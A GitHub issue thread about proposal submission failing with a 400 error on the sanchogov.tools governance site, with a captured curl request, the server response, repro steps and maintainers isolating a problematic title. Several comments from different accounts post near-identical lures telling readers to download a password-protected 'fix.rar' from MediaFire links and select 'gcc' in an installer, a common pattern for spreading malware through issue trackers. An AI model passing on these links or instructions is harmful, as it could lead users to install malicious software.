### ISSUE TITLE
🐛 Creating a proposal is failing with status code 400

### ISSUE THREAD

**Issue by spannercode** [IntersectMBO/govtool#1830]
### Area

Proposal Pillar

### Domain

sanchogov.tools

### Which wallet were you using?

Eternal Beta

### Context

Creating a proposal after verifying the identity and filling in the details fails with no visible error shown.

Here is the screenshot of the console at the moment:
<img width="1437" alt="Screenshot 2024-08-26 at 20 17 04" src="https://github.com/user-attachments/assets/6c0e994c-d5fa-4471-9ab9-b4d236dcfe81">

Looking deeper into the network calls, the POST request to /api/proposals is failing with status code 400
```
curl 'https://z74f91f2d-zb0719f09-gtw.z937eb260.rustrocks.fr/api/proposals' \
  -H 'accept: application/json, text/plain, */*' \
  -H 'accept-language: en-GB,en-US;q=0.9,en;q=0.8' \
  -H 'authorization: Bearer {REMOVED}' \
  -H 'cache-control: no-cache' \
  -H 'content-type: application/json' \
  -H 'origin: https://sanchogov.tools' \
  -H 'pragma: no-cache' \
  -H 'priority: u=1, i' \
  -H 'referer: https://sanchogov.tools/' \
  -H 'sec-ch-ua: "Chromium";v="128", "Not;A=Brand";v="24", "Google Chrome";v="128"' \
  -H 'sec-ch-ua-mobile: ?0' \
  -H 'sec-ch-ua-platform: "macOS"' \
  -H 'sec-fetch-dest: empty' \
  -H 'sec-fetch-mode: cors' \
  -H 'sec-fetch-site: cross-site' \
  -H 'user-agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36' \
  --data-raw '{"data":{"proposal_links":[],"gov_action_type_id":1,"prop_receiving_address":null,"prop_amount":null,"prop_name":"Climate Consciousness in Blockchain: Why Cardano Leads the Way","prop_abstract":"Climate change is one of the most pressing challenges of our time, and its impacts are becoming increasingly apparent across the globe. As technology continues to advance, the need for sustainable practices in all sectors is more urgent than ever.","prop_motivation":"The motivation behind addressing climate change in the context of blockchain technology stems from the recognition that the digital world is not isolated from the physical environment.","prop_rationale":"The rationale for prioritizing climate consciousness when running a blockchain node is rooted in the broader context of environmental responsibility.","is_draft":false}}'
  ```
  Response:
  ```
  {
    "data": null,
    "error": {
        "status": 400,
        "name": "BadRequestError",
        "message": "Bad Request",
        "details": "Proposal content not created"
    }
}
  ```

### Steps to reproduce

- Connect Eternal wallet
- Verify Identity
- Start creating a proposal (Info)
- Fill all the required fields
- On the 'Review Your Submission' screen click submit -> Nothing happens and no visible error is shown.
- Check console/network logs for the errors.

### Actual behavior

No user feedback is provided to the user. The user is stuck on the 'Review Your Submission' page.
On the console, the errors are logged. Screenshot attached on context section above.

### Expected behavior

Proposal should be successfully created.

**Comment by youngerwarrior** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by Ryun1** [comment]
This is very strange!
it worked for me, [see proposal](https://sanchogov.tools/proposal_discussion/26)

**Comment by spannercode** [comment]
The issue seems to be with the title length. 

The title used for the failing test:
```
Climate Consciousness in Blockchain: Why Cardano Leads the Way
```

**Comment by Ryun1** [comment]
> Climate Consciousness in Blockchain: Why Cardano Leads the Way

I can confirm, using this title break submission of proposal

**Comment by masooddahmedd** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/6mkbh6xhau31g
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by NeonRST** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by amir1387aht** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by amir1387aht** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by vpaunovic** [comment]
@bosko-m @spannercode @Ryun1 This can be tested.

**Comment by bosko-m** [comment]
@vpaunovic Im testing this on Preview and still getting **400** with the following string used: "Climate Consciousness in Blockchain: Why Cardano Leads the Way #2"
CC @MSzalowski

**Comment by bosko-m** [comment]
Verified on Preview.
